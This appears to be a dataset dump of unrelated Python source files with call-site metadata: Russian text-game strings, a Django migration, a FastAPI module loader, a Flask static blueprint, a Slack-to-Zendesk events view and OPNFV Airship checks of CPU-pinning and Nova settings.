"""Text parts.""" SEPARATOR = '----------------------------------' CONT_GAME = 'enter для продолжения игры' GREETING = 'Добро пожаловать в игру ''Сундук сокровищ''!\n' \ 'Попробуй себя в роли капитана корабля, собери ' \ 'команду и достань все сокровища!' NAME_QUESTION = 'Как тебя зовут?' CHOOSE_LEVEL = 'Выбери уровень сложности, он влияет на стоимость ' \ 'сокровищ на островах. \n' \ '1 - легко \n' \ '2 - средне \n' \ '3 - тяжело' INTRODUCTION = 'В наследство от дядюшки тебе достался корабль, \n' \ 'несколько золотых монет и карта, на которой \n' \ 'отмечены 10 островов. На каждом из островов \n' \ 'зарыт клад. Но для того, чтобы достать его, \n' \ 'необходимо обезвредить ловушку. Чем больше \n' \ 'порядковый номер острова, тем ценнее хранящееся \n' \ 'на нем сокровище и тем труднее его получить. \n\n' \ 'Цель игры - добыть все сокровища и скопить как можно больше монет. \n\n' \ 'Команда твоего корабля сможет обезвредить ловушку, \n' \ 'только если будет иметь нужное количество очков \n' \ 'логики, силы и ловкости. \n\n' \ '!!! Сумма всех требуемых очков равна номеру острова,\n' \ 'но точная комбинация тебе неизвестна. !!!' ORACLE_QUESTION = 'Здесь неподалеку живет известный оракул. За определенную\n' \ 'плату он сможет предсказать с какой ловушкой\n' \ 'ты столкнешься на острове. Пойдешь ли ты к нему?\n' \ '----------------------------------\n'\ '1 - да, пойду\n' \ '2 - нет, сам разберусь' ORACLE_QUESTION_1 = 'Что ты хочешь узнать у оракула? \n' \ '----------------------------------\n'\ '1 - я передумал, буду сам себе оракул! \n'\ '2 - сколько очков логики должно быть у команды? (1 монета) \n'\ '3 - сколько очков силы должно быть у команды? (1 монета) \n'\ '4 - сколько очков ловкости должно быть у команды? (1 монета) \n'\ '5 - узнать все требуемые характеристики (3 монеты)' ORACLE_QUESTION_2 = 'Что ты хочешь узнать у оракула? \n' \ '----------------------------------\n'\ '1 - я передумал, буду сам себе оракул! \n'\ '2 - сколько очков логики должно быть у команды? (1 монета) \n'\ '3 - сколько очков силы должно быть у команды? (1 монета) \n'\ '4 - сколько очков ловкости должно быть у команды? (1 монета)' GO_TAVERN_TEXT = 'Отлично! Для похода на остров тебе понадобится \n' \ 'команда, а нанять ее ты сможешь в таверне.' EXIT_QUESTION = 'Продолжить игру?\n' \ '----------------------------------\n'\ '1 - да\n' \ '2 - нет' SUCCESS_STEP = 'Поздравляю! Ты смог достать спрятанное сокровище! \n' \ 'Самое время готовиться к следующему походу.' FAILURE_STEP = 'К сожалению, ты не смог достать сокровище. \n' \ 'Если у тебя еще остались монеты, то можешь \n' \ 'попробовать организовать поход заново. Удачи!' WINNING = 'Поздравляю! Ты собрал сокровища со всех окрестных \n' \ 'островов, можешь выкинуть ненужную теперь карту) \n' \ 'Конец игры.' LOSING = 'Сожалею, ты потратил все деньги. Карьера пиратского \n' \ 'капитана подошла к концу. А дядюшка в тебя верил! \n' \ 'Конец игры.' NAMES = ['Боб', 'Ричард', 'Алан', 'Степан', 'Грозный Глаз', 'Гарри', 'Моррис', 'Джек', 'Алекс', 'Сэм', 'Том', 'Янис', 'Геральт', 'Ринсвинд', 'Купер', 'Борис', 'Джон', 'Рон']
[]
alerin345/Instagram-React
api/migrations/0001_initial.py
25dfbcbff2a2d050e4f2804a74cd7c901cd2cb66
# Generated by Django 3.1.3 on 2021-01-07 00:42

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Image',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('picture', models.ImageField(null=True, upload_to='')),
                ('description', models.TextField(blank=True, default='')),
                ('likes', models.IntegerField(default=0)),
                ('comments', models.IntegerField(default=0)),
                ('date', models.DateTimeField(default=django.utils.timezone.now)),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Subscription',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL)),
                ('userSubscribed', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='userSubscribed', to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Profile',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('picture', models.ImageField(blank=True, default='default.png', null=True, upload_to='')),
                ('description', models.TextField(blank=True, default='')),
                ('user', models.OneToOneField(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Like',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('value', models.TextField()),
                ('date', models.DateTimeField(default=django.utils.timezone.now)),
                ('image', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='api.image')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
        migrations.AddConstraint(
            model_name='subscription',
            constraint=models.UniqueConstraint(fields=('user', 'userSubscribed'), name='unique subscribes'),
        ),
        migrations.AddConstraint(
            model_name='like',
            constraint=models.UniqueConstraint(fields=('image', 'user'), name='unique likes'),
        ),
    ]
[((14, 8, 14, 65), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', ({(14, 40, 14, 64): 'settings.AUTH_USER_MODEL'}, {}), '(settings.AUTH_USER_MODEL)', False, 'from django.db import migrations, models\n'), ((67, 23, 67, 107), 'django.db.models.UniqueConstraint', 'models.UniqueConstraint', (), '', False, 'from django.db import migrations, models\n'), ((71, 23, 71, 93), 'django.db.models.UniqueConstraint', 'models.UniqueConstraint', (), '', False, 'from django.db import migrations, models\n'), ((21, 23, 21, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((22, 28, 22, 70), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((23, 32, 23, 72), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((24, 26, 24, 56), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((25, 29, 25, 59), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((26, 25, 26, 80), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((27, 25, 27, 127), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((33, 23, 33, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((34, 25, 34, 148), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((35, 35, 35, 168), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((41, 23, 41, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((42, 28, 42, 105), 'django.db.models.ImageField', 'models.ImageField', (), '', False, 'from django.db import migrations, models\n'), ((43, 32, 43, 72), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import migrations, models\n'), ((44, 25, 44, 130), 'django.db.models.OneToOneField', 'models.OneToOneField', (), '', False, 'from django.db import migrations, models\n'), ((50, 23, 50, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((51, 26, 51, 115), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((52, 25, 52, 127), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((58, 23, 58, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((59, 26, 59, 44), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((60, 25, 60, 80), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n'), ((61, 26, 61, 115), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n'), ((62, 25, 62, 127), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import migrations, models\n')]
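The initial migration above implies model classes along the following lines. This is a hedged reconstruction inferred only from the generated fields, not the project's actual api/models.py; only two of the five models are sketched and the layout is illustrative.

from django.conf import settings
from django.db import models
from django.utils import timezone


class Image(models.Model):
    # Fields mirror the CreateModel('Image') operation in the migration.
    picture = models.ImageField(null=True, upload_to="")
    description = models.TextField(blank=True, default="")
    likes = models.IntegerField(default=0)
    comments = models.IntegerField(default=0)
    date = models.DateTimeField(default=timezone.now)
    user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True,
                             on_delete=models.CASCADE)


class Subscription(models.Model):
    # Two links to the user model, kept unique per (user, userSubscribed) pair.
    user = models.ForeignKey(settings.AUTH_USER_MODEL, null=True,
                             on_delete=models.CASCADE, related_name="user")
    userSubscribed = models.ForeignKey(settings.AUTH_USER_MODEL, null=True,
                                       on_delete=models.CASCADE,
                                       related_name="userSubscribed")

    class Meta:
        constraints = [
            models.UniqueConstraint(fields=("user", "userSubscribed"),
                                    name="unique subscribes"),
        ]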
KiraPC/fastapi-router-controller
fastapi_router_controller/lib/controller_loader.py
e105701ebce2e03a0e00ac182c10941daf1b7e22
import os
import importlib


class ControllerLoader:
    """
    The ControllerLoader class.
    """

    @staticmethod
    def load(directory, package):
        """
        It is an utility to load automatically all the python module
        presents on a given directory
        """
        for module in os.listdir(directory):
            sub_dir = directory + "/" + module
            if os.path.isdir(sub_dir):
                ControllerLoader.load(sub_dir, "{}.{}".format(package, module))
            if module == "__init__.py" or module[-3:] != ".py":
                continue
            else:
                module_import_name = "{}.{}".format(package, module[:-3])
                importlib.import_module(module_import_name)
[((16, 22, 16, 43), 'os.listdir', 'os.listdir', ({(16, 33, 16, 42): 'directory'}, {}), '(directory)', False, 'import os\n'), ((18, 15, 18, 37), 'os.path.isdir', 'os.path.isdir', ({(18, 29, 18, 36): 'sub_dir'}, {}), '(sub_dir)', False, 'import os\n'), ((24, 16, 24, 59), 'importlib.import_module', 'importlib.import_module', ({(24, 40, 24, 58): 'module_import_name'}, {}), '(module_import_name)', False, 'import importlib\n')]
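A minimal usage sketch for the loader above. The `controllers` package name and directory layout are assumptions for illustration; the import path simply mirrors where the file sits in the repository.

import os

from fastapi_router_controller.lib.controller_loader import ControllerLoader

# Import every module found under ./controllers (recursively), so that any
# controller definitions in those modules are registered as a side effect
# of being imported.
controllers_dir = os.path.join(os.path.dirname(__file__), "controllers")
ControllerLoader.load(controllers_dir, "controllers")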
VikrantReddy/Instagram2Shop
app/mod_ecomm/controllers.py
8d9c3f39d277fafb56d10a87a1b62a6df8a74237
from flask import Blueprint, Flask, send_from_directory
from werkzeug.security import check_password_hash, generate_password_hash

from app import db
from app.mod_auth.forms import LoginForm
from app.mod_auth.models import User

mod_ecomm = Blueprint('products', __name__,
                      url_prefix='/products',
                      static_folder='../../frontend/build')


@mod_ecomm.route("/", defaults={'path': ''})
def serve(path):
    if path:
        return send_from_directory(mod_ecomm.static_folder, path)
    else:
        return send_from_directory(mod_ecomm.static_folder, 'index.html')
[((8, 12, 9, 59), 'flask.Blueprint', 'Blueprint', (), '', False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((15, 15, 15, 65), 'flask.send_from_directory', 'send_from_directory', ({(15, 35, 15, 58): 'mod_ecomm.static_folder', (15, 60, 15, 64): 'path'}, {}), '(mod_ecomm.static_folder, path)', False, 'from flask import Blueprint, Flask, send_from_directory\n'), ((17, 15, 17, 73), 'flask.send_from_directory', 'send_from_directory', ({(17, 35, 17, 58): 'mod_ecomm.static_folder', (17, 60, 17, 72): '"""index.html"""'}, {}), "(mod_ecomm.static_folder, 'index.html')", False, 'from flask import Blueprint, Flask, send_from_directory\n')]
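A hedged sketch of how the `products` blueprint above could be attached to the application; the `create_app` factory is illustrative and not taken from the project.

from flask import Flask

from app.mod_ecomm.controllers import mod_ecomm


def create_app():
    app = Flask(__name__)
    # Mounting the blueprint serves the React build under the /products prefix.
    app.register_blueprint(mod_ecomm)
    return app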
phillmac/dagr_selenium
dagr_selenium/crawl_watchlist.py
b7417a878fe4c171625a40e746113ae2c0222335
from .functions import monitor_watchlist_action, manager

with manager.get_dagr():
    monitor_watchlist_action()
[]
uktrade/zenslackchat
zenslackchat/eventsview.py
8071757e1ea20a433783c6a7c47f25b046692682
import pprint
import logging

from django.conf import settings
from rest_framework import status
from rest_framework.views import APIView
from rest_framework.response import Response

from zenslackchat.message import handler
from zenslackchat.models import SlackApp
from zenslackchat.models import ZendeskApp


class Events(APIView):
    """Handle Events using the webapp instead of using the RTM API.

    This is handy as i don't need to run a specifc bot process just to handle
    events. Instead I can just using the webapp REST API for this.

    Handy documentation for Slack events: https://api.slack.com/events-api

    The app needs to subscribe to events to receive them. From
    https://api.slack.com/apps/<APP ID>/event-subscriptions you need to:

    - Enable Events from "Off" to "On"
    - Enter the "Request URL" e.g.: http://<instance id>.ngrok.io/slack/events/
    - Then "Subscribe to events on behalf of users"
    - Click "Add Workspace Event" and add "message.channels".

    Message on channels will now start being recieved. The bot will need to
    be invited to a channel first.

    """
    def post(self, request, *args, **kwargs):
        """Events will come in over a POST request.
        """
        log = logging.getLogger(__name__)

        slack_message = request.data

        if slack_message.get('token') != settings.SLACK_VERIFICATION_TOKEN:
            log.error("Slack message verification failed!")
            return Response(status=status.HTTP_403_FORBIDDEN)

        # verification challenge, convert to signature verification instead:
        if slack_message.get('type') == 'url_verification':
            return Response(data=slack_message, status=status.HTTP_200_OK)

        if 'event' in slack_message:
            event = slack_message.get('event')
            if settings.DEBUG:
                log.debug(f'event received:\n{pprint.pformat(event)}\n')
            try:
                handler(
                    event,
                    our_channel=settings.SRE_SUPPORT_CHANNEL,
                    slack_client=SlackApp.client(),
                    zendesk_client=ZendeskApp.client(),
                    workspace_uri=settings.SLACK_WORKSPACE_URI,
                    zendesk_uri=settings.ZENDESK_TICKET_URI,
                    user_id=settings.ZENDESK_USER_ID,
                    group_id=settings.ZENDESK_GROUP_ID,
                )
            except:  # noqa
                # I want all event even if they cause me problems. If I don't
                # accept the webhook will be marked as broken and then no more
                # events will be sent.
                log.exception("Slack message_handler error: ")

        return Response(status=status.HTTP_200_OK)
[((37, 14, 37, 41), 'logging.getLogger', 'logging.getLogger', ({(37, 32, 37, 40): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((71, 15, 71, 50), 'rest_framework.response.Response', 'Response', (), '', False, 'from rest_framework.response import Response\n'), ((43, 19, 43, 61), 'rest_framework.response.Response', 'Response', (), '', False, 'from rest_framework.response import Response\n'), ((47, 19, 47, 74), 'rest_framework.response.Response', 'Response', (), '', False, 'from rest_framework.response import Response\n'), ((57, 33, 57, 50), 'zenslackchat.models.SlackApp.client', 'SlackApp.client', ({}, {}), '()', False, 'from zenslackchat.models import SlackApp\n'), ((58, 35, 58, 54), 'zenslackchat.models.ZendeskApp.client', 'ZendeskApp.client', ({}, {}), '()', False, 'from zenslackchat.models import ZendeskApp\n'), ((52, 46, 52, 67), 'pprint.pformat', 'pprint.pformat', ({(52, 61, 52, 66): 'event'}, {}), '(event)', False, 'import pprint\n')]
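Since `Events` is a DRF `APIView`, it still has to be routed in the project's URLconf. A minimal sketch, assuming the `/slack/events/` request URL mentioned in the docstring; the real project's urls.py may differ.

from django.urls import path

from zenslackchat.eventsview import Events

urlpatterns = [
    # Must match the "Request URL" registered in the Slack app's
    # event-subscription settings, e.g. http://<instance id>.ngrok.io/slack/events/
    path("slack/events/", Events.as_view(), name="slack-events"),
]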
opnfv/cirv-sdv
sdv/docker/sdvstate/internal/validator/airship/compute_check.py
31fb310d3fd1c9c1f12cfe0c654870e24f5efab6
# Copyright 2020 University Of Delhi. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Compute Related Checks """ import configparser import json import re import logging from tools.kube_utils import kube_exec, get_pod_with_labels from tools.conf import settings from internal import store_result ########### # Checks ########### def isolated_cores_check(): """ isolated_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_isolated_cores() required_value = required_isolated_cores() result = {'category': 'compute', 'case_name': 'isolated_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def reserved_vnf_cores_check(): """ reserved_vnf_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_reserved_vnf_cores() required_value = required_reserved_vnf_cores() result = {'category': 'compute', 'case_name': 'reserved_vnf_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def vswitch_pmd_cores_check(): """ vswitch_pmd_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_vswitch_pmd_cores() required_value = required_vswitch_pmd_cores() result = {'category': 'compute', 'case_name': 'vswitch_pmd_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def vswitch_dpdk_lcores_check(): """ vswitch_dpdk_lcores_check """ logger = logging.getLogger(__name__) traced_value = trace_vswitch_dpdk_lcores() required_value = required_vswitch_dpdk_lcores() result = {'category': 'compute', 'case_name': 'vswitch_dpdk_lcores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def os_reserved_cores_check(): """ os_reserved_cores_check """ logger = logging.getLogger(__name__) traced_value = trace_os_reserved_cores() required_value = required_os_reserved_cores() result = {'category': 'compute', 'case_name': 'os_reserved_cores_check', 'details': {'traced_cores': traced_value, 'required_cores': required_value } } if is_ranges_equals(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def nova_scheduler_filters_check(): """ nova_scheduler_filters_check """ logger = logging.getLogger(__name__) traced_value = trace_nova_scheduler_filters() required_value = required_nova_scheduler_filters() result = {'category': 'compute', 'case_name': 
'nova_scheduler_filters_check', 'details': {'traced_filters': traced_value, 'required_filters': required_value } } if are_lists_equal(traced_value, required_value): result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result def cpu_allocation_ratio_check(): """ cpu_allocation_ratio_check """ logger = logging.getLogger(__name__) traced_value = trace_cpu_allocation_ratio() required_value = required_cpu_allocation_ratio() result = {'category': 'compute', 'case_name': 'cpu_allocation_ratio_check', 'details': {'traced_ratio': traced_value, 'required_ratio': required_value } } if traced_value == required_value: result['criteria'] = 'pass' else: result['criteria'] = 'fail' store_result(logger, result) return result ############### # helper functions ############### def trace_isolated_cores(): """ Trace isolated_cores from Airship deployment :return: value traced from `isolcpus` key in `/proc/cmdline` """ pod = get_pod_with_labels('application=nova,component=compute') cmd = ['cat', '/proc/cmdline'] proc_cmd = kube_exec(pod, cmd) for option in proc_cmd.split(): if 'isolcpus' in option: _, isolcpus_value = split_key_value(option) break return isolcpus_value def required_isolated_cores(): """ Returns value of `isolated_cpus` from platform_profile used by Role for worker nodes in PDF :return: isolated_cores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['isolated_cpus'] def trace_reserved_vnf_cores(): """ Trace vnf_reserved_cores from Airship deployment :return: value traced from `vcpu_pin_set` key in nova.conf of actual deployment """ try: config = get_nova_conf() vcpu_pin_set = config.get('DEFAULT', 'vcpu_pin_set') except (configparser.NoOptionError, configparser.MissingSectionHeaderError): vcpu_pin_set = '' return vcpu_pin_set def required_reserved_vnf_cores(): """ Returns value of vnf_cores from platform_profile used by Role for worker nodes in PDF :return: vnf_reserverd_core value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['vnf_cores'] def trace_vswitch_pmd_cores(): """ Trace vswitch_pmd_cores from Airship deployment :return: value traced from `other_config:pmd-cpu-mask` in openvswitchdb using ovs-vsctl """ ovs_pod = get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd') cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config'] response = kube_exec(ovs_pod, cmd) # convert config str to json str match = re.findall("[a-zA-Z0-9-]+=", response) for key in match: response = response.replace(key, '"' + key[:-1] + '":') match = re.findall(":[a-zA-Z0-9-]+", response) for key in match: response = response.replace(key[1:], '"' + key[1:] + '"') config = json.loads(response) if 'pmd-cpu-mask' in config: pmd_cores = hex_to_comma_list(config['pmd-cpu-mask']) else: pmd_cores = '' return pmd_cores def required_vswitch_pmd_cores(): """ Returns value of vswitch_pmd_cores from platform_profile used by Role for worker nodes in PDF :return: vswitch_pmd_cores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['vswitch_pmd_cores'] def trace_vswitch_dpdk_lcores(): """ Trace vswitch_dpdk_lcores from Airship deployment :return: value traced from `other_config:dpdk-lcore-mask` in openvswitchdb using ovs-vsctl """ ovs_pod = 
get_pod_with_labels('application=openvswitch,component=openvswitch-vswitchd') cmd = ['ovs-vsctl', '-t', '5', 'get', 'Open_vSwitch', '.', 'other_config'] response = kube_exec(ovs_pod, cmd) # convert config str to json str match = re.findall("[a-zA-Z0-9-]+=", response) for key in match: response = response.replace(key, '"' + key[:-1] + '":') match = re.findall(":[a-zA-Z0-9-]+", response) for key in match: response = response.replace(key[1:], '"' + key[1:] + '"') config = json.loads(response) if 'dpdk-lcore-mask' in config: pmd_cores = hex_to_comma_list(config['dpdk-lcore-mask']) else: pmd_cores = '' return pmd_cores def required_vswitch_dpdk_lcores(): """ Returns value of vswitch_dpdk_lcores from platform_profile used by Role for worker nodes in PDF :return: vswitch_dpdk_lcores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['vswitch_dpdk_lcores'] def trace_os_reserved_cores(): """ Trace os_reserved_cores from Airship deployment os_reserved_cores = all_cores - (reserved_vnf_cores + vswitch_pmd_cores + vswitch_dpdk_lcores) """ worker_role = settings.getValue('WORKER_ROLE_NAME') all_cores = get_cores_by_role(worker_role) reserved_vnf_cores = trace_reserved_vnf_cores() vswitch_pmd_cores = trace_vswitch_pmd_cores() vswitch_dpdk_lcores = trace_vswitch_dpdk_lcores() non_os_cores = [] non_os_cores.extend(convert_range_to_list(reserved_vnf_cores)) non_os_cores.extend(convert_range_to_list(vswitch_pmd_cores)) non_os_cores.extend(convert_range_to_list(vswitch_dpdk_lcores)) os_reserved_cores = set(all_cores).difference(set(non_os_cores)) # return as string with comma separated value return ','.join(map(str, list(os_reserved_cores))) def required_os_reserved_cores(): """ Returns value of os_reserved_cores from platform_profile used by Role for worker nodes in PDF :return: os_reserved_cores value expected by the PDF """ worker_role = settings.getValue('WORKER_ROLE_NAME') profile = get_platform_profile_by_role(worker_role) return profile['os_reserved_cores'] def trace_nova_scheduler_filters(): """ Trace scheduler_filters from Airship deployment :return: value traced from `enabled_filters` key in nova.conf of actual deployment """ try: config = get_nova_conf() filters = config.get('filter_scheduler', 'enabled_filters') except (configparser.NoOptionError, configparser.MissingSectionHeaderError): filters = '' filters = filters.split(',') map(str.strip, filters) return filters def required_nova_scheduler_filters(): """ Required nova scheduler_filters by the PDF """ pdf = settings.getValue('pdf_file') filters = pdf['vim_functional']['scheduler_filters'] filters = filters.split(',') map(str.strip, filters) return filters def trace_cpu_allocation_ratio(): """ Trace cpu_allocation_ratio from Airship deployment :return: value traced from `cpu_allocation_ratio` key in nova.conf of actual deployment """ try: config = get_nova_conf() cpu_allocation_ratio = config.get('DEFAULT', 'cpu_allocation_ratio') except (configparser.NoOptionError, configparser.MissingSectionHeaderError): cpu_allocation_ratio = '' return float(cpu_allocation_ratio) def required_cpu_allocation_ratio(): """ Required cpu_allocation_ratio by the PDF """ pdf = settings.getValue('pdf_file') cpu_allocation_ratio = pdf['vim_functional']['cpu_allocation_ratio'] return float(cpu_allocation_ratio) def get_role(role_name): """ Searches and returns role with `role_name` """ roles = settings.getValue('pdf_file')['roles'] for role in roles: if role['name'] == 
role_name: role_details = role return role_details def get_platform_profile(profile_name): """ Searches and returns platform_profile with `profile_name` """ platform_profiles = settings.getValue('pdf_file')['platform_profiles'] for profile in platform_profiles: if profile['profile_name'] == profile_name: profile_details = profile return profile_details def get_processor_profile(profile_name): """ Searches and returns processor_profile with `profile_name` """ processor_profiles = settings.getValue('pdf_file')['processor_profiles'] for profile in processor_profiles: if profile['profile_name'] == profile_name: profile_details = profile return profile_details def get_platform_profile_by_role(role_name): """ Returns platform profile details of a role """ role = get_role(role_name) profile = get_platform_profile(role['platform_profile']) return profile def get_hardware_profile_by_role(role_name): """ Returns hardware profile details of a role """ role = get_role(role_name) hardware_profiles = settings.getValue('pdf_file')['hardware_profiles'] for profile in hardware_profiles: if profile['profile_name'] == role['hardware_profile']: profile_details = profile return profile_details def get_cores_by_role(role_name): """ Returns cpu cores list of server hardware used in the role """ hardware_profile = get_hardware_profile_by_role(role_name) processor_profile = hardware_profile['profile_info']['processor_profile'] profile = get_processor_profile(processor_profile) cpus = [] for numa in profile['profile_info']['numas']: cpus.extend(convert_range_to_list(numa['cpu_set'])) return cpus def get_nova_conf(): """ Returns parsed nova.conf """ pod = get_pod_with_labels('application=nova,component=compute') cmd = ['cat', '/etc/nova/nova.conf'] response = kube_exec(pod, cmd) config = configparser.ConfigParser() config.read_string(response) return config ### cpu cores related helper function def convert_range_to_list(x): """ Returns list of numbers from given range as string e.g.: convert_range_to_list('3-5') will give [3, 4, 5] """ # pylint: disable=C0103 result = [] for part in x.split(','): if '-' in part: a, b = part.split('-') a, b = int(a), int(b) result.extend(range(a, b + 1)) elif part != '': a = int(part) result.append(a) # remove duplicates result = list(dict.fromkeys(result)) return result def is_ranges_equals(range1, range2): """ Checks whether two ranges passed as string are equal e.g.: is_ranges_equals('2-5', '2-4,5') returns true """ set1 = set(convert_range_to_list(range1)) set2 = set(convert_range_to_list(range2)) return set1 == set2 def are_lists_equal(list1, list2): """ Checks whether two list are identicals """ set1 = set(list1) set2 = set(list2) return set1 == set2 def hex_to_comma_list(hex_mask): """ Converts CPU mask given in hex to list of cores """ binary = bin(int(hex_mask, 16))[2:] reversed_binary = binary[::-1] i = 0 output = "" for bit in reversed_binary: if bit == '1': output = output + str(i) + ',' i = i + 1 return output[:-1] def comma_list_to_hex(cpus): """ Converts a list of cpu cores in corresponding hex value of cpu-mask """ cpu_arr = cpus.split(",") binary_mask = 0 for cpu in cpu_arr: binary_mask = binary_mask | (1 << int(cpu)) return format(binary_mask, '02x') def split_key_value(key_value_str, delimiter='='): """ splits given string into key and value based on delimiter :param key_value_str: example string `someKey=somevalue` :param delimiter: default delimiter is `=` :return: [ key, value] """ key, value = key_value_str.split(delimiter) key = key.strip() value = 
value.strip() return key, value
[((37, 13, 37, 40), 'logging.getLogger', 'logging.getLogger', ({(37, 31, 37, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((54, 4, 54, 32), 'internal.store_result', 'store_result', ({(54, 17, 54, 23): 'logger', (54, 25, 54, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((63, 13, 63, 40), 'logging.getLogger', 'logging.getLogger', ({(63, 31, 63, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((80, 4, 80, 32), 'internal.store_result', 'store_result', ({(80, 17, 80, 23): 'logger', (80, 25, 80, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((89, 13, 89, 40), 'logging.getLogger', 'logging.getLogger', ({(89, 31, 89, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((106, 4, 106, 32), 'internal.store_result', 'store_result', ({(106, 17, 106, 23): 'logger', (106, 25, 106, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((115, 13, 115, 40), 'logging.getLogger', 'logging.getLogger', ({(115, 31, 115, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((132, 4, 132, 32), 'internal.store_result', 'store_result', ({(132, 17, 132, 23): 'logger', (132, 25, 132, 31): 'result'}, {}), '(logger, result)', False, 'from internal import store_result\n'), ((141, 13, 141, 40), 'logging.getLogger', 'logging.getLogger', ({(141, 31, 141, 39): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((158, 4, 158, 32), 'internal.store_result', 'store_result', ({(158, 17, 158, 23): 'logger', (158, 25, 158, 31): 'result'}, 